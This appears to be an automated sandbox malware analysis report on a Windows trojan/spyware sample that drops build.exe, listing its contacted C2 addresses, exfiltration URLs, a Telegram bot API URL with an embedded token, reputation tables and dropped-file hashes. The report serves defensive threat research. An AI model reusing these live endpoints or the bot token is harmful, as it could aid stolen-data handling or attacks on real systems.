                                                      https://192.99.196.191:443build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://168.138.211.88:8099build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://18.228.80.130:80build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://209.38.221.184:8080/I85OAzj7Op/yLWFd_userbuild.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=77347build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbuild.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://ip-api.combuild.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://209.38.221.184:8080/yLWFd_user%40927537_report.wsrbuild.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://185.217.98.121:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://8.219.110.16:9999build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebuild.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://209.38.221.184build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKbuild.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://8.216.92.21:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://65.49.205.24:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://47.96.78.224:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://129.151.109.160:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icobuild.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://147.28.185.29:80build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/soap/encoding/build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://154.9.207.142:443build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://41.216.183.9:80802build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://209.38.221.184:8080build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://209.38.221.184:8080/getbuild.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.w3.orbuild.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://206.166.251.4:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_userbuild.exe, 00000002.00000002.2295681999.0000026B66DAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://194.164.198.113:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://38.207.174.88:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://ip-api.com/line?fields=querybuild.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://127.0.0.1:18772/handleOpenWSR?r=http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_userbuild.exe, 00000002.00000002.2295681999.0000026B66DAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://159.203.174.113:8090build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://101.126.19.171:80build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.ecosia.org/newtab/build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brbuild.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&unbuild.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://185.217.98.121:443build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://46.235.26.83:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://ac.ecosia.org/autocomplete?q=build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://116.202.101.219:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://38.60.191.38:80build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://67.230.176.97:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://132.145.17.167:9090build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://api.telebuild.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                              unknown
                                                                                                                              http://schemas.xmlsoap.org/wsdl/build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://127.0.0.1:18772/handleOpenWSR?r=build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://51.159.4.50:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://8.222.143.111:8080build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://41.216.183.9:8080build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://support.mozilla.orgbuild.exe, 00000002.00000002.2301595940.0000026B76CAE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2301595940.0000026B76CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://41.87.207.180:9090build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://api.telegram.orgbuild.exe, 00000002.00000002.2295681999.0000026B66D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs
                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          209.38.221.184
                                                                                                                                          unknownUnited States
                                                                                                                                          7018ATT-INTERNET4UStrue
                                                                                                                                          208.95.112.1
                                                                                                                                          ip-api.comUnited States
                                                                                                                                          53334TUT-ASUSfalse
                                                                                                                                          149.154.167.220
                                                                                                                                          api.telegram.orgUnited Kingdom
                                                                                                                                          62041TELEGRAMRUtrue
                                                                                                                                          41.216.183.9
                                                                                                                                          unknownSouth Africa
                                                                                                                                          40676AS40676UStrue
                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1545189
                                                                                                                                          Start date and time:2024-10-30 08:10:08 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 5m 37s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:29
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:file.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@28/5@2/4
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 65%
                                                                                                                                          • Number of executed functions: 29
                                                                                                                                          • Number of non-executed functions: 6
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target file.exe, PID 7088 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                          • VT rate limit hit for: file.exe
                                                                                                                                          TimeTypeDescription
                                                                                                                                          03:11:04API Interceptor2229280x Sleep call for process: build.exe modified
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          208.95.112.1Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                                                                                                                          • ip-api.com/json/
                                                                                                                                          sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          Transferencia.docGet hashmaliciousQuasarBrowse
                                                                                                                                          • ip-api.com/json/
                                                                                                                                          SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                          • ip-api.com/json
                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                          • ip-api.com/json
                                                                                                                                          SecuriteInfo.com.Python.Muldrop.16.26792.13248.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          ip-api.comComprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          Transferencia.docGet hashmaliciousQuasarBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 51.195.5.58
                                                                                                                                          SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          SecuriteInfo.com.Python.Muldrop.16.26792.13248.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          api.telegram.org ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          ATT-INTERNET4USLJSS65p4Kz.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 13.185.186.102
                                                                                                                                          W6Z9uSRsKQ.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 75.50.134.43
                                                                                                                                          wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 108.254.96.86
                                                                                                                                          SuNMTBkfPo.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.126.55.218
                                                                                                                                          8v2IShmMos.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 70.245.246.214
                                                                                                                                          B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 108.86.82.51
                                                                                                                                          vHnFyxemFf.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 99.49.173.221
                                                                                                                                          v6pwbOEUpl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 108.84.118.225
                                                                                                                                          j3Lr4Fk7Kb.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.173.111.171
                                                                                                                                          belks.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 76.192.178.208
                                                                                                                                          TELEGRAMRU ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          AS40676US8v2IShmMos.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.106.233.206
                                                                                                                                          http://bigfoot99.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.61.136.67
                                                                                                                                          nklm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 23.133.14.68
                                                                                                                                          jklx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 103.78.120.42
                                                                                                                                          kkkmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.73.172.180
                                                                                                                                          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 107.169.77.138
                                                                                                                                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.119.203.211
                                                                                                                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.149.164.41
                                                                                                                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 205.161.47.115
                                                                                                                                          botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                          • 45.35.129.164
                                                                                                                                          TUT-ASUSComprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          Transferencia.docGet hashmaliciousQuasarBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          SecuriteInfo.com.Python.Muldrop.16.26792.13248.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                          • 208.95.112.1
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eReff_Yazaki-europe_575810710108_ZnjKTIejsM.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          3231167_00-AG00_NL_PDF.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          No context
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:1
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                          File Type:CSV text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1498
                                                                                                                                          Entropy (8bit):5.364175471524945
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
                                                                                                                                          MD5:1B713A2FD810C1C9A8F6F6BE36F406B1
                                                                                                                                          SHA1:0828576CB8B83C21F36AD29E327D845AB3574EBB
                                                                                                                                          SHA-256:E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
                                                                                                                                          SHA-512:D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:CSV text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):226
                                                                                                                                          Entropy (8bit):5.360398796477698
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                                          MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                                          SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                                          SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                                          SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):228440
